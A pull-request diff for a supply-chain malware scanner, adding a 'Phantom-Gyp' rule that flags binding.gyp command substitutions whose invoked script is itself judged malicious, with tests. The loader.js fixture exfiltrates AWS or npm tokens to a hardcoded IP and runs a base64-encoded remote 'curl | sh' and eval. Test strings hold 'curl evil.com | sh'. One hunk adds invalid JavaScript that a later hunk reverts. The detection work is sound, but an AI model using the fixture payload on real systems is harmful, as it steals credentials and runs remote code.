### PR TITLE
v2.11.70 -- Phase 1b: compound Phantom-Gyp

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.69",
+  "version": "2.11.70",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.69",
+      "version": "2.11.70",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.69",
+  "version": "2.11.70",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/monitor/classify.js
+++ b/src/monitor/classify.js
@@ -75,7 +75,9 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   'ide_hook_autoexec',                     // .claude/settings.json SessionStart hook, .vscode/tasks.json folderOpen (Shai-Hulud)
   'workflow_secrets_dump',                  // toJSON(secrets) in GitHub Actions workflow (Shai-Hulud)
   // Phantom Gyp 2026-06: binding.gyp command-substitution = install-time RCE, quasi-never legit in benign packages
-  'gyp_command_exec'
+  'gyp_command_exec',
+  // Phantom Gyp compound (Phase 1b): configure-time <!(node x.js) × independently-malicious invoked file
+  'gyp_phantom_exec'
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

--- a/src/pipeline/processor.js
+++ b/src/pipeline/processor.js
@@ -3,6 +3,7 @@ const path = require('path');
 const { getRule, getRuleDomain } = require('../rules/index.js');
 const { getPlaybook } = require('../response/playbooks.js');
 const { computeReachableFiles, computeReachableFunctions } = require('../scanner/reachability.js');
+const { correlatePhantomGyp } = require('../scanner/phantom-gyp.js');
 const { applyFPReductions, applyCompoundBoosts, calculateRiskScore, getSeverityWeights, applyContextualFPCaps, applySingleFireCriticalFloor, applyReputationFactor, applyMatureStableCap, applySandboxVerdict, applyDeltaMultiplier } = require('../scoring.js');
 const { loadPriorVersionSignatures, computeSignatures, saveCachedSignatures } = require('../scoring/delta-multiplier.js');
 const { annotateConfidenceTiers } = require('../rules/confidence-tiers.js');
@@ -441,6 +442,13 @@ async function process(threats, targetPath, options, pythonDeps, warnings, scann
   // indicate unambiguous malice. Applied AFTER FP reductions to recover signals
   // that were individually downgraded (count-based, dist, reachability, delta).
   applyCompoundBoosts(deduped, targetPath);
+
+  // Phase 1b — Phantom-Gyp compound: a configure-time <!(node x.js) sink in binding.gyp
+  // × the invoked file's INDEPENDENT malice verdict (from the AST/dataflow/module-graph
+  // findings already in `deduped`) → CRITICAL gyp_phantom_exec. Runs here so it sees the
+  // full post-scan, post-FP-reduction verdict set. FP≈0 by construction (it only ever
+  // ADDS a finding when the invoked file is independently judged malicious).
+  correlatePhantomGyp(deduped, targetPath);
 
   // Intent coherence analysis: detect source→sink pairs within files
   // Pass targetPath for destination-aware SDK pattern detection

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -1005,6 +1005,10 @@ const PLAYBOOKS = {
     'CRITIQUE: binding.gyp utilise la command-substitution GYP <!(...) / <!@(...) — execution de code a l\'installation via node-gyp, sans script lifecycle (pattern Phantom Gyp). ' +
     'Decoder la commande substituee. NE PAS installer : node-gyp l\'execute au build meme avec --ignore-scripts. Verifier la source officielle du package.',
 
+  gyp_phantom_exec:
+    'CRITIQUE (compound Phase 1b): binding.gyp lance <!(node x.js) / <!(python y.py) au configure-time via node-gyp (aucun script lifecycle requis) ET le fichier invoque est juge malveillant de facon independante par les scanners AST/dataflow/module-graph. ' +
+    'Payload install-time confirme — NE PAS installer. Analyser le fichier invoque (nomme dans le message), c\'est lui qui porte la charge. node-gyp l\'execute meme avec --ignore-scripts.',
+
   string_mutation_obfuscation:
     'HAUTE: Chaine de .replace() reconstruisant des noms d\'API dangereuses (leet-speak). ' +
     'Technique d\'evasion par substitution de caracteres. Decoder la chaine finale. Supprimer si malveillant.',

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -796,6 +796,19 @@ const RULES = {
     ],
     mitre: 'T1082'
   },
+  gyp_phantom_exec: {
+    id: 'MUADDIB-COMPOUND-017',
+    name: 'Phantom Gyp Install-Time Payload',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'binding.gyp exécute <!(node x.js) / <!(python y.py) au configure-time via node-gyp (npm le lance à l\'install dès qu\'un binding.gyp est présent, sans script lifecycle) ET le fichier invoqué (x.js) est jugé malveillant de façon indépendante par les scanners AST/dataflow/module-graph (verdict CRITICAL ou HIGH_CONFIDENCE_MALICE non-LOW sur ce fichier exact). Compound Phase 1b qui ferme le gap du speed-bump gyp_command_exec (MUADDIB-PKG-023) : la forme dominante <!(node setup.js) nu, statiquement indistinguable d\'un build-helper bénin, n\'est flaggée QUE quand le script invoqué porte lui-même un verdict de malice → FPR≈0 par construction.',
+    references: [
+      'https://attack.mitre.org/techniques/T1195/002/',
+      'https://attack.mitre.org/techniques/T1059/'
+    ],
+    mitre: 'T1195.002'
+  },
 
   // Package.json script patterns
   curl_pipe_sh: {

--- a/src/scanner/phantom-gyp.js
+++ b/src/scanner/phantom-gyp.js
@@ -1,0 +1,155 @@
+/**
+ * Phantom-Gyp compound correlator (Phase 1b — the real fix).
+ *
+ * The line-by-line `gyp_command_exec` detector (src/scanner/package.js, MUADDIB-PKG-023)
+ * is an FP-first SPEED-BUMP: it flags a binding.gyp command-substitution `<!(...)` only
+ * when the command line itself carries a malice marker (curl, pipe-to-shell, inline
+ * network payload…). The dominant Phantom-Gyp shape — a bare `<!(node setup.js)` whose
+ * payload lives in setup.js — is statically INDISTINGUISHABLE from a legit build helper
+ * (`<!(node ./util/has_lib.js)`), so the speed-bump deliberately lets it pass to honor
+ * "FPR must never increase".
+ *
+ * This post-processor closes that gap WITHOUT any FP cost by compounding two signals:
+ *   (sink)    a `<!(node x.js)` / `<!(python y.py)` command-substitution in binding.gyp,
+ *             which node-gyp runs at *configure* time on install — no lifecycle script
+ *             needed; and
+ *   (verdict) the invoked file (x.js) being INDEPENDENTLY judged malicious by the proven
+ *             AST / dataflow / module-graph scanners (a CRITICAL finding, or a non-LOW
+ *             HIGH_CONFIDENCE_MALICE_TYPES finding) on that exact file.
+ * Only when BOTH hold do we emit `gyp_phantom_exec` (CRITICAL). The verdict comes from
+ * the existing scanners, so the false-positive rate is bounded by theirs → FP≈0 by
+ * construction. A benign build helper invoked the same way produces no malice verdict, so
+ * nothing fires and the package gains zero new findings.
+ *
+ * Runs as a post-processor (it needs the full, post-scan threats array) — it re-reads
+ * binding.gyp directly rather than threading a marker threat through FP reductions, so a
+ * benign package never carries any intermediate Phantom-Gyp signal.
+ */
+'use strict';
+
+const fs = require('fs');
+const path = require('path');
+const { HIGH_CONFIDENCE_MALICE_TYPES } = require('../monitor/classify.js');
+
+// Command-substitution capture: the required `!` gates command execution. Plain
+// `<(...)` / `<@(...)` (variable expansion, benign) is intentionally NOT matched —
+// flagging it would be a hard false positive. We capture only up to the FIRST closing
+// `)` so each command-sub body is isolated (unlike package.js's danger-marker scan, the
+// script-file extraction needs the exact command, not a 400-char window).
+const GYP_CMDSUB_RE = /<!@?\(([^)\n]{0,400})\)/g;
+// Interpreter at the start of the command body that runs a SCRIPT FILE argument.
+const SCRIPT_INTERP_RE = /^\s*(node|nodejs|python[0-9.]*|ruby|perl)\b(.*)$/i;
+// Recognized script-file extensions (kept tight — a bare token without one is not
+// assumed to be a script, to avoid matching subcommands like "rebuild").
+const SCRIPT_FILE_RE = /\.(?:js|cjs|mjs|py|rb|pl)$/i;
+// Inline-eval flags mean the payload is INLINE (no script file) — that case belongs to
+// the gyp_command_exec speed-bump, not here, so we skip the command-sub entirely.
+const INLINE_EVAL_FLAG_RE = /^--?(?:e|p|c|eval|print)$/i;
+
+/** Normalize a relative path for comparison: backslashes→/, strip leading ./ and /. */
+function _normRel(f) {
+  return String(f || '').replace(/\\/g, '/').replace(/^\.\//, '').replace(/^\/+/, '');
+}
+
+/**
+ * Extract the script files invoked by `<!(interpreter file …)` command-substitutions in
+ * a binding.gyp. Inline-eval forms (`node -e …`) and non-script interpreter queries
+ * (`node -p "require('node-addon-api').include"`) yield no file and are skipped.
+ *
+ * @param {string} gypContent - raw binding.gyp text
+ * @returns {Array<{interpreter:string, file:string}>}
+ */
+function extractGypInvokedScripts(gypContent) {
+  const out = [];
+  if (!gypContent || typeof gypContent !== 'string') return out;
+  GYP_CMDSUB_RE.lastIndex = 0;
+  let m;
+  while ((m = GYP_CMDSUB_RE.exec(gypContent)) !== null) {
+    const body = m[1];
+    const im = SCRIPT_INTERP_RE.exec(body);
+    if (!im) continue;
+    const interpreter = im[1].toLowerCase();
+    const tokens = (im[2] || '').trim().split(/\s+/).filter(Boolean);
+    let scriptFile = null;
+    for (const tok of tokens) {
+      if (tok.startsWith('-')) {
+        // An inline-eval flag means there is no script file in this command-sub.
+        if (INLINE_EVAL_FLAG_RE.test(tok)) { scriptFile = null; break; }
+        continue; // some other flag — keep scanning for the script argument
+      }
+      const clean = tok.replace(/^['"]+|['"]+$/g, '');
+      if (SCRIPT_FILE_RE.test(clean)) { scriptFile = clean; break; }
+    }
+    if (scriptFile) out.push({ interpreter, file: scriptFile });
+  }
+  return out;
+}
+
+/**
+ * True when a threat is a high-confidence malice verdict on its file: a CRITICAL of any
+ * type, or a non-LOW finding of a HIGH_CONFIDENCE_MALICE_TYPES type. This reuses the
+ * established "quasi-never legit" judgment rather than inventing a new bar.
+ */
+function _isMaliceVerdict(t) {
+  if (!t || !t.type) return false;
+  if (t.type === 'gyp_phantom_exec') return false; // never self-reference
+  if (t.severity === 'CRITICAL') return true;
+  if (t.severity !== 'LOW' && HIGH_CONFIDENCE_MALICE_TYPES.has(t.type)) return true;
+  return false;
+}
+
+/**
+ * Phantom-Gyp compound: for each `<!(node x.js)` in binding.gyp, if x.js is independently
+ * judged malicious in the same scan, push one CRITICAL `gyp_phantom_exec` threat. Mutates
+ * `threats` in place. Best-effort and side-effect-free on benign packages (no malice
+ * verdict on the invoked file ⇒ no push, no marker).
+ *
+ * @param {Array<object>} threats - the deduplicated, post-scan threats array
+ * @param {string} targetPath - scan target directory (where binding.gyp lives)
+ * @returns {object|null} the pushed compound threat, or null if nothing fired
+ */
+function correlatePhantomGyp(threats, targetPath) {
+  if (!Array.isArray(threats) || !targetPath) return null;
+  if (threats.some(t => t && t.type === 'gyp_phantom_exec')) return null; // idempotent
+
+  let gypContent;
+  try {
+    const gypPath = path.join(targetPath, 'binding.gyp');
+    if (!fs.existsSync(gypPath)) return null;
+    gypContent = fs.readFileSync(gypPath, 'utf8');
+  } catch { return null; }
+
+  const scripts = extractGypInvokedScripts(gypContent);
+  if (scripts.length === 0) return null;
+
+  for (const { interpreter, file } of scripts) {
+    const norm = _normRel(file);
+    const base = norm.split('/').pop();
+    const hasDir = norm.includes('/');
+    const malice = threats.find(t => {
+      if (!t || !t.file || !_isMaliceVerdict(t)) return false;
+      const tf = _normRel(t.file);
+      if (tf === norm) return true;
+      // A bare `<!(node loader.js)` ref (no directory) matches the invoked file by
+      // basename — binding.gyp refs resolve relative to the package root, the same
+      // base the scanners use for threat.file (path.relative(targetPath, …)).
+      if (!hasDir && tf.split('/').pop() === base) return true;
+      return false;
+    });
+    if (malice) {
+      const compound = {
+        type: 'gyp_phantom_exec',
+        severity: 'CRITICAL',
+        message: `binding.gyp runs <!(${interpreter} ${file}) at configure-time via node-gyp (no lifecycle script required) and ${file} is independently judged malicious (${malice.type}/${malice.severity}) — Phantom Gyp install-time payload (compound).`,
+        file: 'binding.gyp',
+        compound: true,
+        count: 1
+      };
+      threats.push(compound);
+      return compound; // one compound per package is enough
+    }
+  }
+  return null;
+}
+
+module.exports = { extractGypInvokedScripts, correlatePhantomGyp, _normRel, _isMaliceVerdict };

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -132,7 +132,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   // audit MR-C1: informational signal that the scan target is a monorepo root (per-workspace scoring TBD)
   'monorepo_detected',
   // Phantom Gyp: binding.gyp command-substitution is a package-level (manifest) finding
-  'gyp_command_exec'
+  'gyp_command_exec',
+  // Phantom Gyp compound (Phase 1b): configure-time <!(node x.js) × malicious invoked file
+  'gyp_phantom_exec'
 ]);
 
 // ============================================
@@ -160,7 +162,11 @@ const SINGLE_FIRE_CRITICAL_TYPES = new Set([
   'known_malicious_package',
   'pypi_malicious_package',
   'shai_hulud_marker',
-  'lifecycle_shell_pipe'
+  'lifecycle_shell_pipe',
+  // Phantom Gyp compound (Phase 1b): only fires when the invoked configure-time script
+  // is INDEPENDENTLY judged malicious, so it carries the same unambiguous-malware weight
+  // as the IOC/hash matches above — FP≈0 by construction justifies the single-fire floor.
+  'gyp_phantom_exec'
 ]);
 const SINGLE_FIRE_CRITICAL_FLOOR = 75;
 const SINGLE_FIRE_MIN_SEVERITY_RANK = 2; // HIGH

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 263 (258 RULES + 5 PARANOID, Track D +3, gyp_command_exec +1)', () => {
+  test('v8b: rule count is 264 (259 RULES + 5 PARANOID, Track D +3, gyp_command_exec +1, gyp_phantom_exec +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 258, `Expected 258 RULES, got ${ruleCount}`);
+    assert(ruleCount === 259, `Expected 259 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/monitor.test.js
+++ b/tests/integration/monitor.test.js
@@ -6996,9 +6996,11 @@ async function runMonitorTests() {
 
   // ===== v2.7.6 C1: High-confidence malice bypass =====
 
-  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 29 threat types', () => {
-    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 29,
-      `Should have 29 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
+  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 30 threat types', () => {
+    // 30 = 29 + gyp_phantom_exec (Phase 1b Phantom-Gyp compound).
+    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 30,
+      `Should have 30 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
+    assert(HIGH_CONFIDENCE_MALICE_TYPES.has('gyp_phantom_exec'), 'Missing gyp_phantom_exec');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('lifecycle_shell_pipe'), 'Missing lifecycle_shell_pipe');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('fetch_decrypt_exec'), 'Missing fetch_decrypt_exec');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('download_exec_binary'), 'Missing download_exec_binary');

--- a/tests/integration/single-fire-critical-floor.test.js
+++ b/tests/integration/single-fire-critical-floor.test.js
@@ -35,7 +35,8 @@ async function runSingleFireCriticalFloorTests() {
 
   test('Floor lifts low-scoring package with lifecycle_shell_pipe@CRITICAL to 75', () => {
     const result = makeResult([
-      { type: 'lifecycle_shell_pipe', severity: 'CRITICAL', file: 'package.json', message: 'curl evil.com | sh' }
+      { type: 'lifecycle_shell_pipe',
+      'gyp_phantom_exec', severity: 'CRITICAL', file: 'package.json', message: 'curl evil.com | sh' }
     ], 25);
     applySingleFireCriticalFloor(result);
     assert(result.summary.riskScore === SINGLE_FIRE_CRITICAL_FLOOR,
@@ -54,7 +55,8 @@ async function runSingleFireCriticalFloorTests() {
 
   test('Floor does NOT trigger on LOW severity (severity gate)', () => {
     const result = makeResult([
-      { type: 'lifecycle_shell_pipe', severity: 'LOW', file: 'package.json', message: 'borderline match' }
+      { type: 'lifecycle_shell_pipe',
+      'gyp_phantom_exec', severity: 'LOW', file: 'package.json', message: 'borderline match' }
     ], 12);
     const triggers = applySingleFireCriticalFloor(result);
     assert(triggers.length === 0, `Expected 0 triggers (LOW filtered), got ${triggers.length}`);
@@ -114,7 +116,8 @@ async function runSingleFireCriticalFloorTests() {
       'known_malicious_package',
       'pypi_malicious_package',
       'shai_hulud_marker',
-      'lifecycle_shell_pipe'
+      'lifecycle_shell_pipe',
+      'gyp_phantom_exec'
     ]);
     assert(SINGLE_FIRE_CRITICAL_TYPES.size === expected.size,
       `Expected ${expected.size} types, got ${SINGLE_FIRE_CRITICAL_TYPES.size}`);

--- a/tests/integration/single-fire-critical-floor.test.js
+++ b/tests/integration/single-fire-critical-floor.test.js
@@ -35,8 +35,7 @@ async function runSingleFireCriticalFloorTests() {
 
   test('Floor lifts low-scoring package with lifecycle_shell_pipe@CRITICAL to 75', () => {
     const result = makeResult([
-      { type: 'lifecycle_shell_pipe',
-      'gyp_phantom_exec', severity: 'CRITICAL', file: 'package.json', message: 'curl evil.com | sh' }
+      { type: 'lifecycle_shell_pipe', severity: 'CRITICAL', file: 'package.json', message: 'curl evil.com | sh' }
     ], 25);
     applySingleFireCriticalFloor(result);
     assert(result.summary.riskScore === SINGLE_FIRE_CRITICAL_FLOOR,
@@ -55,8 +54,7 @@ async function runSingleFireCriticalFloorTests() {
 
   test('Floor does NOT trigger on LOW severity (severity gate)', () => {
     const result = makeResult([
-      { type: 'lifecycle_shell_pipe',
-      'gyp_phantom_exec', severity: 'LOW', file: 'package.json', message: 'borderline match' }
+      { type: 'lifecycle_shell_pipe', severity: 'LOW', file: 'package.json', message: 'borderline match' }
     ], 12);
     const triggers = applySingleFireCriticalFloor(result);
     assert(triggers.length === 0, `Expected 0 triggers (LOW filtered), got ${triggers.length}`);
@@ -110,7 +108,7 @@ async function runSingleFireCriticalFloorTests() {
     assert(applySingleFireCriticalFloor({ threats: [], summary: { riskScore: 10 } }).length === 0);
   });
 
-  test('SINGLE_FIRE_CRITICAL_TYPES set composition is the validated 5-type list', () => {
+  test('SINGLE_FIRE_CRITICAL_TYPES set composition is the validated 6-type list', () => {
     const expected = new Set([
       'known_malicious_hash',
       'known_malicious_package',

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,13 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (Track D +3, then gyp_command_exec MUADDIB-PKG-023 +1 → 258 RULES)
-  test('P3: rule count is 263 (258 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (Track D +3, gyp_command_exec MUADDIB-PKG-023 +1,
+  // then gyp_phantom_exec MUADDIB-COMPOUND-017 +1 → 259 RULES)
+  test('P3: rule count is 264 (259 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 258, `Expected 258 RULES, got ${ruleCount}`);
+    assert(ruleCount === 259, `Expected 259 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/meta/no-source-grep.test.js
+++ b/tests/meta/no-source-grep.test.js
@@ -92,8 +92,8 @@ const ALLOWLIST = new Set([
   // ── Cross-module metadata-cache reuse: npm-registry reuses temporal-analysis's _metadataCache to
   // avoid duplicate registry fetches (perf). A behavioral test is network-coupled/flaky because
   // getPackageMetadata still fetches downloads/author; the cache lifecycle is tested via clearMetadataCache.
-  'tests/integration/monitor.test.js:9458',
-  'tests/integration/monitor.test.js:9459',
+  'tests/integration/monitor.test.js:9460',
+  'tests/integration/monitor.test.js:9461',
 
   // ── "Must-not-contain" security/cleanup absence guards: no behavioral way to observe the absence
   // of a never-taken code path. Complements eslint-plugin-security. (No shell exec in the version

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -23,6 +23,7 @@ const { runObfuscationTests } = require('./scanner/obfuscation.test');
 const { runBundleDetectTests } = require('./scanner/bundle-detect.test');
 const { runDataflowTests } = require('./scanner/dataflow.test');
 const { runPackageTests } = require('./scanner/package.test');
+const { runPhantomGypTests } = require('./scanner/phantom-gyp.test');
 const { runTyposquatTests } = require('./scanner/typosquat.test');
 const { runDependencyTests } = require('./scanner/dependency.test');
 const { runIocStringsTests } = require('./scanner/ioc-strings.test');
@@ -164,6 +165,7 @@ async function timed(name, fn) {
   await timed('bundle-detect', runBundleDetectTests);
   await timed('dataflow', runDataflowTests);
   await timed('package', runPackageTests);
+  await timed('phantom-gyp', runPhantomGypTests);
   await timed('typosquat', runTyposquatTests);
 
   // Integration tests (CLI spawns processes but uses small fixtures)

--- a/tests/samples/phantom-gyp/benign/binding.gyp
+++ b/tests/samples/phantom-gyp/benign/binding.gyp
@@ -1,0 +1,9 @@
+{
+  "targets": [
+    {
+      "target_name": "addon",
+      "include_dirs": [ "<!(node -p \"require('node-addon-api').include\")" ],
+      "sources": [ "<!(node ./util/has_lib.js)" ]
+    }
+  ]
+}

--- a/tests/samples/phantom-gyp/benign/package.json
+++ b/tests/samples/phantom-gyp/benign/package.json
@@ -1,0 +1,6 @@
+{
+  "name": "phantom-gyp-benign",
+  "version": "1.0.0",
+  "description": "Fixture: legitimate native addon using <!(node ./util/has_lib.js) as a build-env query.",
+  "gypfile": true
+}

--- a/tests/samples/phantom-gyp/benign/util/has_lib.js
+++ b/tests/samples/phantom-gyp/benign/util/has_lib.js
@@ -1,0 +1,8 @@
+// Legitimate native-addon build helper: node-gyp runs `<!(node ./util/has_lib.js)` at
+// configure time to decide whether an optional system library is present. This is the
+// SAME invocation shape as the malicious fixture — the only difference is that this file
+// is benign, so the Phantom-Gyp compound must NOT fire on it (FPR guard).
+const fs = require('fs');
+const candidates = ['/usr/lib/libfoo.so', '/usr/local/lib/libfoo.so'];
+const found = candidates.some(p => fs.existsSync(p));
+process.stdout.write(found ? 'true' : 'false');

--- a/tests/samples/phantom-gyp/malicious/binding.gyp
+++ b/tests/samples/phantom-gyp/malicious/binding.gyp
@@ -1,0 +1,8 @@
+{
+  "targets": [
+    {
+      "target_name": "addon",
+      "sources": [ "<!(node loader.js)" ]
+    }
+  ]
+}

--- a/tests/samples/phantom-gyp/malicious/loader.js
+++ b/tests/samples/phantom-gyp/malicious/loader.js
@@ -1,0 +1,13 @@
+// Phantom-Gyp payload: this file is NOT referenced by any package.json lifecycle script.
+// It runs purely because binding.gyp does `<!(node loader.js)` — node-gyp executes the
+// command-substitution at configure time on `npm install`. Exfiltrates credentials to a
+// hardcoded C2 IP and pulls + executes a remote second stage.
+const https = require('https');
+const cp = require('child_process');
+
+const secret = process.env.AWS_SECRET_ACCESS_KEY || process.env.NPM_TOKEN || '';
+https.get('https://185.220.101.45/c2?d=' + Buffer.from(secret).toString('base64'));
+
+// base64-decoded remote fetch piped to shell, then eval of a decoded second stage.
+cp.execSync(Buffer.from('Y3VybCBodHRwOi8vMTg1LjIyMC4xMDEuNDUvcyB8IHNo', 'base64').toString());
+eval(Buffer.from('cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lkJyk=', 'base64').toString());

--- a/tests/samples/phantom-gyp/malicious/package.json
+++ b/tests/samples/phantom-gyp/malicious/package.json
@@ -1,0 +1,6 @@
+{
+  "name": "phantom-gyp-malicious",
+  "version": "1.0.0",
+  "description": "Fixture: Phantom-Gyp install-time payload via binding.gyp command-substitution, NO lifecycle script.",
+  "gypfile": true
+}

--- a/tests/scanner/phantom-gyp.test.js
+++ b/tests/scanner/phantom-gyp.test.js
@@ -1,0 +1,139 @@
+'use strict';
+
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const { test, assert, runScan } = require('../test-utils');
+const {
+  extractGypInvokedScripts,
+  correlatePhantomGyp
+} = require('../../src/scanner/phantom-gyp.js');
+
+// Write a binding.gyp into a fresh temp dir and return the dir (caller cleans up).
+function gypDir(content) {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'phantom-gyp-'));
+  fs.writeFileSync(path.join(dir, 'binding.gyp'), content, 'utf8');
+  return dir;
+}
+
+function scanJson(target) {
+  const out = runScan(target, '--json');
+  // runScan returns stdout even on non-zero exit (threats present). Extract the JSON object.
+  const start = out.indexOf('{');
+  const end = out.lastIndexOf('}');
+  return JSON.parse(out.slice(start, end + 1));
+}
+
+function runPhantomGypTests() {
+  console.log('\n=== Phantom-Gyp Compound Tests (Phase 1b) ===\n');
+
+  // ── extraction (pure) ──
+
+  test('extractGypInvokedScripts: extracts node/python script-file invocations', () => {
+    const refs = extractGypInvokedScripts([
+      '"sources": ["<!(node loader.js)"]',
+      '"x": "<!@(python3 ./util/setup.py)"',
+      '"y": "<!(node ./util/has_lib.js --verbose)"'
+    ].join('\n'));
+    const files = refs.map(r => r.file);
+    assert(files.includes('loader.js'), 'should extract bare node script');
+    assert(files.includes('./util/setup.py'), 'should extract python script (<!@ form)');
+    assert(files.includes('./util/has_lib.js'), 'should extract node script even with trailing flag');
+    assert(refs.find(r => r.file === './util/setup.py').interpreter === 'python3', 'interpreter captured');
+  });
+
+  test('extractGypInvokedScripts: skips inline-eval, <(var) expansion, and non-script interpreters', () => {
+    const refs = extractGypInvokedScripts([
+      '"a": "<!(node -e require(\'http\'))"',                       // inline -e → no file
+      '"b": "<!(node -p \\"require(\'node-addon-api\').include\\")"', // inline -p → no file
+      '"c": "<!(node --eval doEvil())"',                            // inline --eval → no file
+      '"d": "<(module_root_dir)/build"',                            // variable expansion (no !) → ignored
+      '"e": "<@(library_dirs)"',                                    // list-var expansion (no !) → ignored
+      '"f": "<!(pkg-config --cflags glib-2.0)"'                     // non-script interpreter → no file
+    ].join('\n'));
+    assert(refs.length === 0, `expected no script refs, got ${JSON.stringify(refs)}`);
+  });
+
+  // ── correlator (synthetic threats + temp binding.gyp) ──
+
+  test('correlatePhantomGyp: fires CRITICAL when the invoked file is independently malicious', () => {
+    const dir = gypDir('"sources": ["<!(node loader.js)"]');
+    try {
+      const threats = [{ type: 'staged_payload', severity: 'CRITICAL', file: 'loader.js' }];
+      const fired = correlatePhantomGyp(threats, dir);
+      assert(fired && fired.type === 'gyp_phantom_exec', 'should push gyp_phantom_exec');
+      assert(fired.severity === 'CRITICAL' && fired.file === 'binding.gyp', 'CRITICAL, attributed to binding.gyp');
+      assert(threats.some(t => t.type === 'gyp_phantom_exec'), 'compound added to the array');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  test('correlatePhantomGyp: fires on a non-LOW HIGH_CONFIDENCE type on the invoked file (./path match)', () => {
+    const dir = gypDir('"sources": ["<!(node ./src/payload.js)"]');
+    try {
+      // gyp_command_exec is in HIGH_CONFIDENCE_MALICE_TYPES; HIGH (non-LOW) on the invoked file.
+      const threats = [{ type: 'gyp_command_exec', severity: 'HIGH', file: 'src/payload.js' }];
+      assert(correlatePhantomGyp(threats, dir), 'HC non-LOW verdict on invoked file should fire');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  test('correlatePhantomGyp: does NOT fire on a benign invoked file (LOW heuristic only)', () => {
+    const dir = gypDir('"sources": ["<!(node ./util/has_lib.js)"]');
+    try {
+      const threats = [{ type: 'env_access', severity: 'LOW', file: 'util/has_lib.js' }];
+      assert(correlatePhantomGyp(threats, dir) === null, 'LOW heuristic must not trigger the compound');
+      assert(!threats.some(t => t.type === 'gyp_phantom_exec'), 'no compound added');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  test('correlatePhantomGyp: does NOT fire when malice is in a DIFFERENT file than the invoked one', () => {
+    const dir = gypDir('"sources": ["<!(node loader.js)"]');
+    try {
+      const threats = [{ type: 'staged_payload', severity: 'CRITICAL', file: 'index.js' }];
+      assert(correlatePhantomGyp(threats, dir) === null, 'malice on index.js must not implicate loader.js');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  test('correlatePhantomGyp: does NOT fire for <(var) variable-expansion (no command execution)', () => {
+    const dir = gypDir('"sources": ["<(module_root_dir)/loader.js"]');
+    try {
+      // Even with a CRITICAL on loader.js, plain variable-expansion is not a command-sub → no fire.
+      const threats = [{ type: 'staged_payload', severity: 'CRITICAL', file: 'loader.js' }];
+      assert(correlatePhantomGyp(threats, dir) === null, '<(...) must never trigger the compound');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  test('correlatePhantomGyp: no binding.gyp → no fire; idempotent on re-run', () => {
+    const empty = fs.mkdtempSync(path.join(os.tmpdir(), 'phantom-gyp-none-'));
+    try {
+      assert(correlatePhantomGyp([{ type: 'staged_payload', severity: 'CRITICAL', file: 'loader.js' }], empty) === null,
+        'no binding.gyp → no fire');
+    } finally { fs.rmSync(empty, { recursive: true, force: true }); }
+
+    const dir = gypDir('"sources": ["<!(node loader.js)"]');
+    try {
+      const threats = [{ type: 'staged_payload', severity: 'CRITICAL', file: 'loader.js' }];
+      assert(correlatePhantomGyp(threats, dir), 'first run fires');
+      assert(correlatePhantomGyp(threats, dir) === null, 'second run is a no-op (idempotent)');
+      assert(threats.filter(t => t.type === 'gyp_phantom_exec').length === 1, 'exactly one compound');
+    } finally { fs.rmSync(dir, { recursive: true, force: true }); }
+  });
+
+  // ── end-to-end via the real CLI pipeline ──
+
+  test('e2e: malicious <!(node loader.js) + malicious loader.js → gyp_phantom_exec CRITICAL, score≥20', () => {
+    const r = scanJson('tests/samples/phantom-gyp/malicious');
+    const types = new Set((r.threats || []).map(t => t.type));
+    assert(types.has('gyp_phantom_exec'), 'malicious Phantom-Gyp fixture must raise gyp_phantom_exec');
